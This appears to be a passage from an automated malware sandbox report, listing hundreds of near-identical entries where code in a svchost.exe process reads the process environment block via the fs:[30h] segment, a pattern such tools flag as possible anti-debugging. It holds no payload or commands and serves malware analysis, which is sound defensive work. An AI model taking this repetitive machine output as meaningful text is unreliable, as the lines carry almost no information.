                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C700 mov eax, dword ptr fs:[00000030h]2_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830710 mov eax, dword ptr fs:[00000030h]2_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860710 mov eax, dword ptr fs:[00000030h]2_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C720 mov eax, dword ptr fs:[00000030h]2_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov ecx, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386273C mov eax, dword ptr fs:[00000030h]2_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AC730 mov eax, dword ptr fs:[00000030h]2_2_038AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov esi, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386674D mov eax, dword ptr fs:[00000030h]2_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830750 mov eax, dword ptr fs:[00000030h]2_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE75D mov eax, dword ptr fs:[00000030h]2_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872750 mov eax, dword ptr fs:[00000030h]2_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4755 mov eax, dword ptr fs:[00000030h]2_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838770 mov eax, dword ptr fs:[00000030h]2_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840770 mov eax, dword ptr fs:[00000030h]2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834690 mov eax, dword ptr fs:[00000030h]2_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C6A6 mov eax, dword ptr fs:[00000030h]2_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038666B0 mov eax, dword ptr fs:[00000030h]2_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A6C7 mov eax, dword ptr fs:[00000030h]2_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE6F2 mov eax, dword ptr fs:[00000030h]2_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B06F1 mov eax, dword ptr fs:[00000030h]2_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE609 mov eax, dword ptr fs:[00000030h]2_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384260B mov eax, dword ptr fs:[00000030h]2_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03872619 mov eax, dword ptr fs:[00000030h]2_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E627 mov eax, dword ptr fs:[00000030h]2_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F866E mov eax, dword ptr fs:[00000030h]2_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A660 mov eax, dword ptr fs:[00000030h]2_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862674 mov eax, dword ptr fs:[00000030h]2_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov eax, dword ptr fs:[00000030h]2_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832582 mov ecx, dword ptr fs:[00000030h]2_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864588 mov eax, dword ptr fs:[00000030h]2_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E59C mov eax, dword ptr fs:[00000030h]2_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B05A7 mov eax, dword ptr fs:[00000030h]2_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038545B1 mov eax, dword ptr fs:[00000030h]2_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E5CF mov eax, dword ptr fs:[00000030h]2_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038365D0 mov eax, dword ptr fs:[00000030h]2_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A5D0 mov eax, dword ptr fs:[00000030h]2_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E5E7 mov eax, dword ptr fs:[00000030h]2_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038325E0 mov eax, dword ptr fs:[00000030h]2_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C5ED mov eax, dword ptr fs:[00000030h]2_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6500 mov eax, dword ptr fs:[00000030h]2_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904500 mov eax, dword ptr fs:[00000030h]2_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840535 mov eax, dword ptr fs:[00000030h]2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E53E mov eax, dword ptr fs:[00000030h]2_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838550 mov eax, dword ptr fs:[00000030h]2_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386656A mov eax, dword ptr fs:[00000030h]2_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA49A mov eax, dword ptr fs:[00000030h]2_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038364AB mov eax, dword ptr fs:[00000030h]2_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038644B0 mov ecx, dword ptr fs:[00000030h]2_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BA4B0 mov eax, dword ptr fs:[00000030h]2_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038304E5 mov ecx, dword ptr fs:[00000030h]2_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868402 mov eax, dword ptr fs:[00000030h]2_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E420 mov eax, dword ptr fs:[00000030h]2_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C427 mov eax, dword ptr fs:[00000030h]2_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6420 mov eax, dword ptr fs:[00000030h]2_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A430 mov eax, dword ptr fs:[00000030h]2_2_0386A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E443 mov eax, dword ptr fs:[00000030h]2_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA456 mov eax, dword ptr fs:[00000030h]2_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382645D mov eax, dword ptr fs:[00000030h]2_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385245A mov eax, dword ptr fs:[00000030h]2_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC460 mov ecx, dword ptr fs:[00000030h]2_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385A470 mov eax, dword ptr fs:[00000030h]2_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840BBE mov eax, dword ptr fs:[00000030h]2_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4BB0 mov eax, dword ptr fs:[00000030h]2_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850BCB mov eax, dword ptr fs:[00000030h]2_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830BCD mov eax, dword ptr fs:[00000030h]2_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEBD0 mov eax, dword ptr fs:[00000030h]2_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838BF0 mov eax, dword ptr fs:[00000030h]2_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EBFC mov eax, dword ptr fs:[00000030h]2_2_0385EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCBF0 mov eax, dword ptr fs:[00000030h]2_2_038BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904B00 mov eax, dword ptr fs:[00000030h]2_2_03904B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AEB1D mov eax, dword ptr fs:[00000030h]2_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EB20 mov eax, dword ptr fs:[00000030h]2_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F8B28 mov eax, dword ptr fs:[00000030h]2_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E4B4B mov eax, dword ptr fs:[00000030h]2_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]2_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]2_2_038D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]2_2_03828B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]2_2_038DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]2_2_0382CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]2_2_0386CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
